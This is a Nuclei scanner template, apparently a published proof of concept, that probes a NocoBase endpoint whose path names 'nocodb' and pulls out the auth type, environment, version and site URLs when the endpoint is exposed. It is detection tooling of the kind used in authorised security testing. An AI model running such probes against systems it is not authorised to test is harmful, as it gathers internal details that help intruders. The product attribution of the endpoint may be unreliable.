The path /api/v1/db/meta/nocodb/info of the NocoBase web application was exposed, revealing internal information. NocoBase was an extensibility-first, open-source no-code/low-code platform for building business applications and enterprise solutions.
PoC代码[已公开]
id: nocobase-config
info:
name: Nocobase - Config
author: icarot
severity: medium
description: |
The path /api/v1/db/meta/nocodb/info of the NocoBase web application was exposed, revealing internal information. NocoBase was an extensibility-first, open-source no-code/low-code platform for building business applications and enterprise solutions.
reference:
- https://github.com/nocobase/nocobase/
- https://www.nocobase.com/
metadata:
max-request: 1
vendor: nocobase
product: nocobase
tags: nocobase,config,exposed,vuln
http:
- raw:
- |
GET /api/v1/db/meta/nocodb/info HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"authType":'
- '"env":'
- '"version":'
- '"ncSiteUrl":'
- '"mainSubDomain":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: json
json:
- '"authType: " + .authType'
- '"env: " + .env'
- '"version: " + .version'
- '"ncSiteUrl: " + .ncSiteUrl'
- '"mainSubDomain: " + .mainSubDomain'
# digest: 4b0a0048304602210081298239c5423347a8f589dabd27da684d11653fb05253a040acd4d3e0a8bd64022100b94acd4199acaea84e1a6c24c898c0b323efab8e2cd02fbc10c23b9ca695f746:922c64590222798bb761d5b6d8e72950